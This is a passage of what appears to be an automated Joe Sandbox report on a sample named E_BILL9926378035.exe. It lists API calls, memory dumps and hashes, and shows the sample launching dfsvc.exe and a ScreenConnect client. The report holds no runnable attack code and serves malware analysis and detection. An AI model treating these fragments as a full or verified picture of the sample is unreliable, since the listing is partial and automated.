Part of subcall function 00EF4869: GetLastError.KERNEL32(?,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?,?), ref: 00EF4891

_free.LIBCMT ref: 00EF6274
_free.LIBCMT ref: 00EF627F
_free.LIBCMT ref: 00EF62D3
_free.LIBCMT ref: 00EF62DE
_free.LIBCMT ref: 00EF62E9
_free.LIBCMT ref: 00EF62F4

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: 96e44c91135ab3edd5d7a1dde92b7540f3fc71db15a3ac95567673b5652faac3
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: 72113A71541B9CABD620BBB1CC07FEB77DCAF40740F405825B79EB7093EA65AA048690

Function 00EF23D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00EF23C8,00EF209F,00EF1AFC), ref: 00EF23DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EF23ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EF2406
SetLastError.KERNEL32(00000000,00EF23C8,00EF209F,00EF1AFC), ref: 00EF2458

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f4d36f804604728587bfce85234665bc34b13dc00230fe388d64a97f272586f4
Instruction ID: 0e99b570a6adf830e89adcdc5bc242a5cad5c46e1a6b4d6ce96b737986dd325b
Opcode Fuzzy Hash: f4d36f804604728587bfce85234665bc34b13dc00230fe388d64a97f272586f4
Instruction Fuzzy Hash: F801D43220931D5FE6242BB9AC8567B3794FB017B8720223DF730B10E4EF914C81A244

Function 00EF4424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,00EF6D69,?,?,?,00F004C8,0000002C,00EF3F34,00000016,00EF209F,00EF1AFC), ref: 00EF4428
_free.LIBCMT ref: 00EF445B
_free.LIBCMT ref: 00EF4483
SetLastError.KERNEL32(00000000), ref: 00EF4490
SetLastError.KERNEL32(00000000), ref: 00EF449C
_abort.LIBCMT ref: 00EF44A2

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c75fda8ea390040c8556a07557696ce5b285a3cd00778a614ee9dd48f2ff445d
Instruction ID: 1943fb3ad30d19a434638c024d71b5cd98b96de74f7396851e666f6d5cf34a74
Opcode Fuzzy Hash: c75fda8ea390040c8556a07557696ce5b285a3cd00778a614ee9dd48f2ff445d
Instruction Fuzzy Hash: 29F0C8B250068CAAC6267735BC09B7B36AAAFC17B1B246514FB3CF22D1FF60CD019121

Function 00EF36FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EF36AD,?,?,00EF364D,?,00F002E0,0000000C,00EF37A4,?,00000002), ref: 00EF371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EF372F
FreeLibrary.KERNEL32(00000000,?,?,?,00EF36AD,?,?,00EF364D,?,00F002E0,0000000C,00EF37A4,?,00000002,00000000), ref: 00EF3752

Strings

mscoree.dll, xrefs: 00EF3715
CorExitProcess, xrefs: 00EF3727

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 56dedc34edff8bf4f79e9d82fa1b6a68bb74d71cad0336b1f75da6ab141c492f
Instruction ID: d5731f8150b307a5fc5a659c38496ebd1f8bc924bd902e875388d4c4b976d564
Opcode Fuzzy Hash: 56dedc34edff8bf4f79e9d82fa1b6a68bb74d71cad0336b1f75da6ab141c492f
Instruction Fuzzy Hash: 35F04F70A0020CFFCB11ABA1DC49BBEBFF8EF48756F044065FA05B21A0DB315A44DA90

Function 00EF634D Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00EF54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00EF639A
__alloca_probe_16.LIBCMT ref: 00EF63D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EF6423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EF6435
__freea.LIBCMT ref: 00EF643E

Part of subcall function 00EF62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00EF7E5B,?,00000000,?,00EF686F,?,00000004,00000000,?,?,?,00EF3BCD), ref: 00EF6331

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 5195cee893b3ce67b527a2915dd2b42c4e3d8ba2a43a7c0ba38987e53edd085d
Instruction ID: e07dbb81699fb294a6695d3bd1503da915f92640304fe39f38e0ecc22ca4fe37
Opcode Fuzzy Hash: 5195cee893b3ce67b527a2915dd2b42c4e3d8ba2a43a7c0ba38987e53edd085d
Instruction Fuzzy Hash: 1C31AD72A0021EABDF25AFA5DC45DBE7BA5FB40314F044268FD24EA160EB35CD55CBA0

Function 00EF561E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00EF5627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EF564A

Part of subcall function 00EF62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00EF7E5B,?,00000000,?,00EF686F,?,00000004,00000000,?,?,?,00EF3BCD), ref: 00EF6331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EF5670
_free.LIBCMT ref: 00EF5683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EF5692

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 9a68d5bb542562e691aebab33fc61b7db832bf86f060577d0709142cf1521941
Instruction ID: ee78720be40537b834332b356e09d4ba1a6aa988d915a72a3d85336df07dff1e
Opcode Fuzzy Hash: 9a68d5bb542562e691aebab33fc61b7db832bf86f060577d0709142cf1521941
Instruction Fuzzy Hash: 60017173602A5DBF27211BA7AC48C7B6A6DDED6BA53561129FB24E3140EF608E0181B0

Function 00EF44A8 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00EF47FE,00EF7E79,?,00EF686F,?,00000004,00000000,?,?,?,00EF3BCD,?,00000000), ref: 00EF44AD
_free.LIBCMT ref: 00EF44E2
_free.LIBCMT ref: 00EF4509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00EF4516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00EF451F

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c2908469be1742dd7e4b1727a0a38fa0a4d260745bf8a337e3c0b3b8caedc949
Instruction ID: 5c4b5763dbba820e7845f4bc5b29989e1c3367dbac6ac22115b65dc4c7d84a91
Opcode Fuzzy Hash: c2908469be1742dd7e4b1727a0a38fa0a4d260745bf8a337e3c0b3b8caedc949
Instruction Fuzzy Hash: 6A01F9F620064CABD21677356C45E3B22AEBBD13B57202025FB29F21D2EF608D015020

Function 00EF6176 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00EF618E

Part of subcall function 00EF4869: HeapFree.KERNEL32(00000000,00000000,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?), ref: 00EF487F
Part of subcall function 00EF4869: GetLastError.KERNEL32(?,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?,?), ref: 00EF4891

_free.LIBCMT ref: 00EF61A0
_free.LIBCMT ref: 00EF61B2
_free.LIBCMT ref: 00EF61C4
_free.LIBCMT ref: 00EF61D6

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9895612a6ebf57419633de27e61e87a0ba6c2c3880d0cae0488f3b8ae43bd33d
Instruction ID: cfa1077f85424bfb6e848686baf4d9228c5b0e6c1695746f6701ab3c949a05c9
Opcode Fuzzy Hash: 9895612a6ebf57419633de27e61e87a0ba6c2c3880d0cae0488f3b8ae43bd33d
Instruction Fuzzy Hash: FAF0627260529CAFC664EF55F981C3B77EDBA40B543582805F64DF7592CB31FC809650

Function 00EF3D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00EF3DAD

Part of subcall function 00EF4869: HeapFree.KERNEL32(00000000,00000000,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?), ref: 00EF487F
Part of subcall function 00EF4869: GetLastError.KERNEL32(?,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?,?), ref: 00EF4891

_free.LIBCMT ref: 00EF3DBF
_free.LIBCMT ref: 00EF3DD2
_free.LIBCMT ref: 00EF3DE3
_free.LIBCMT ref: 00EF3DF4

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b958b7ec502e00d5b1b973321fee6446174bd30bd32650a8736662cf968f32f6
Instruction ID: f7afecbbd4840b5a46fe2948dc42c9ab0e264bd41dce70589b1c4e2e01abf02a
Opcode Fuzzy Hash: b958b7ec502e00d5b1b973321fee6446174bd30bd32650a8736662cf968f32f6
Instruction Fuzzy Hash: 74F05EB88122ECCFCB956F25FC4542A7BA4BB447603042217FA02AA2F1C7310951BBD0

Function 00EF2F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\E_BILL9926378035.exe,00000104), ref: 00EF2F93
_free.LIBCMT ref: 00EF305E
_free.LIBCMT ref: 00EF3068

Strings

C:\Users\user\Desktop\E_BILL9926378035.exe, xrefs: 00EF2F8A, 00EF2F91, 00EF2FC0, 00EF2FF8

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\E_BILL9926378035.exe
API String ID: 2506810119-632845851
Opcode ID: 8154058404a641bf4601ee175fbe4e978d628aecdec643847836aba97ece77eb
Instruction ID: 9b9e024ea9e2dc9466f5a0d59a67397cde8f2b81457a7d73aacfd51ad044002f
Opcode Fuzzy Hash: 8154058404a641bf4601ee175fbe4e978d628aecdec643847836aba97ece77eb
Instruction Fuzzy Hash: 4C315371A0025CAFDB219BA5D8819BEBBFCEB85714B105067F604B7251DB714E40DB51

Function 00EF25E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00EF2594,00000000,?,00F01B50,?,?,?,00EF2737,00000004,InitializeCriticalSectionEx,00EFBC48,InitializeCriticalSectionEx), ref: 00EF25F0
GetLastError.KERNEL32(?,00EF2594,00000000,?,00F01B50,?,?,?,00EF2737,00000004,InitializeCriticalSectionEx,00EFBC48,InitializeCriticalSectionEx,00000000,?,00EF24C7), ref: 00EF25FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00EF2622

Strings

api-ms-, xrefs: 00EF2607

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1b65f6ac76d27342a82242e0de685277b913ae6802f244c11e241e05ab45174e
Instruction ID: 03825f25fd13f926177d3fe1eda24c169efce38ad0d073cc8c7676755f76c4c0
Opcode Fuzzy Hash: 1b65f6ac76d27342a82242e0de685277b913ae6802f244c11e241e05ab45174e
Instruction Fuzzy Hash: 1CE01A70680308FBEF211B61EC06F7A3F58AB50B55F215464FB0DF84E1EBA1A9589945

Function 00EF57DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00EF5784,00000000,00000000,00000000,00000000,?,00EF5981,00000006,FlsSetValue), ref: 00EF580F
GetLastError.KERNEL32(?,00EF5784,00000000,00000000,00000000,00000000,?,00EF5981,00000006,FlsSetValue,00EFC4D8,FlsSetValue,00000000,00000364,?,00EF44F6), ref: 00EF581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EF5784,00000000,00000000,00000000,00000000,?,00EF5981,00000006,FlsSetValue,00EFC4D8,FlsSetValue,00000000), ref: 00EF5829

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a4db03e67fc32a0f0cbc3823c8486156c4730f19405c961a38fda0bea8a5386b
Instruction ID: 6b480b4c70db47503300aa3c8136435af65c11f19b4966cb5f69eb18bd7e49cb
Opcode Fuzzy Hash: a4db03e67fc32a0f0cbc3823c8486156c4730f19405c961a38fda0bea8a5386b
Instruction Fuzzy Hash: B001D43361566AEFC7254A69EC44AB7779CAF547F0B200634FB1AF7180DB20D804C6E0

Function 00EF4EBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,00EF5147,?), ref: 00EF4EE9
GetACP.KERNEL32(00000000,?,?,00EF5147,?), ref: 00EF4F00

Strings

GQ, xrefs: 00EF4ED7

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID:
String ID: GQ
API String ID: 0-729018712
Opcode ID: b335cf0c8c2ccb6bda2bba97cf3c119b9ca07a7786207815ac6508d7718f6603
Instruction ID: ea460f366239ad49d979b6630037dddb1e72aa3b0b4aae368876b31ca348f76a
Opcode Fuzzy Hash: b335cf0c8c2ccb6bda2bba97cf3c119b9ca07a7786207815ac6508d7718f6603
Instruction Fuzzy Hash: E3F04FB190010C9BDB24DB68DC487BA7774BB80339F502344F639AA9E1C7715954CB51

Analysis Process: dfsvc.exePID: 5812, Parent PID: 1928COMMON

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	120
Total number of Limit Nodes:	12

Executed Functions

Function 00007FFD9B891488 Relevance: 1.9, APIs: 1, Instructions: 434
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFD9B891827

Memory Dump Source

Source File: 00000001.00000002.2609891369.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8dcee35e29fa3f28c14f908d1a2b8eb1efe7ab1d2e98f7eefc5c830fa9bbf6d7
Instruction ID: 106ab8d4c0c2683e25a051a79cd496ee33eb6a15bfb62b9a904ff946bca166aa
Opcode Fuzzy Hash: 8dcee35e29fa3f28c14f908d1a2b8eb1efe7ab1d2e98f7eefc5c830fa9bbf6d7
Instruction Fuzzy Hash: C2D16862B0FBC91FEB6697A858652787FD1EF5A350B0941FFC089C71F7E918A9028341

Function 00007FFD9B89E8D2 Relevance: 1.8, APIs: 1, Instructions: 280
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetGetCookieW.WININET ref: 00007FFD9B89EAB6

Memory Dump Source

Source File: 00000001.00000002.2609891369.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: 3c7836af39f0d0c98eb944f0d84027896eb6df89d8fe2a2c58e4a6c8e3c866b4
Instruction ID: 3ffc1935c1ea7ca014a6264c8470fec368d1093d31a230f90c18db063ac12917
Opcode Fuzzy Hash: 3c7836af39f0d0c98eb944f0d84027896eb6df89d8fe2a2c58e4a6c8e3c866b4
Instruction Fuzzy Hash: 7F91F230609B8D8FDB69DF2888557E93BE1FF59311F05426FD84DCB2A2CA7499058781

Function 00007FFD9B8999EB Relevance: 1.7, APIs: 1, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFD9B899B1C

Memory Dump Source

Source File: 00000001.00000002.2609891369.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b35e249018620df4cd8f829a7719d6531d50a05c0fac28904051d4ee6c30c7f7
Instruction ID: a498cfd96408080c4ea074a8d8099fe05a68421b63e412738a187391f9db28e7
Opcode Fuzzy Hash: b35e249018620df4cd8f829a7719d6531d50a05c0fac28904051d4ee6c30c7f7
Instruction Fuzzy Hash: 29518F71A0CA5C8FDB68DF58E845BA9BBE0FF59310F1442AEE04DD3252CB34A9458B81

Function 00007FFD9B77EEC0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2609408111.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b77d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee0eaf0e52acb04168c8417b5f35e0c0e8ffe0e9960f6964c703d6ad04f1039
Instruction ID: e0ddc93e9547b46431ecbfd4286a42ff5650d2a6f0d938e519ac08e59d55f9a3
Opcode Fuzzy Hash: 7ee0eaf0e52acb04168c8417b5f35e0c0e8ffe0e9960f6964c703d6ad04f1039
Instruction Fuzzy Hash: 4541097150EBC44FE7568B2898959523FF0EF57320B1606DFD088CB1B3D665A846C7A2

Analysis Process: ScreenConnect.WindowsClient.exePID: 7700, Parent PID: 5812COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B894890 Relevance: 1.7, APIs: 1, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 00007FFD9B8AF2C6

Memory Dump Source

Source File: 00000009.00000002.1936991286.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 7d9c90802891490c1d912c541db78fa2069e06ca4b2c239522b926b07e276789
Instruction ID: efaa9379e55eb9e4db990f7fc9922ed33bc571dcc964c33b1622e1b314055d33
Opcode Fuzzy Hash: 7d9c90802891490c1d912c541db78fa2069e06ca4b2c239522b926b07e276789
Instruction Fuzzy Hash: E3610E7261FBC84FDB249B9C58552B87FE1EF99310F1842BFE08C831A7E915A9058381

Function 00007FFD9B89F67B Relevance: 1.7, APIs: 1, Instructions: 178
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B89F7AC

Memory Dump Source

Source File: 00000009.00000002.1936991286.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 366de46d305f5b413d65787f8d7b51d684824399b4de96fd67f77dbe96a26634
Instruction ID: a06642cf9d901e4f6321b7e2ef84f5e2c416ab01dafdcb0df59230f093a8969c
Opcode Fuzzy Hash: 366de46d305f5b413d65787f8d7b51d684824399b4de96fd67f77dbe96a26634
Instruction Fuzzy Hash: 5E51C071A0CA5C9FDB68DF58D845BE8BBE0FB59310F1442AEE04DD3252CB34A985CB81

Function 00007FFD9B893EAA Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

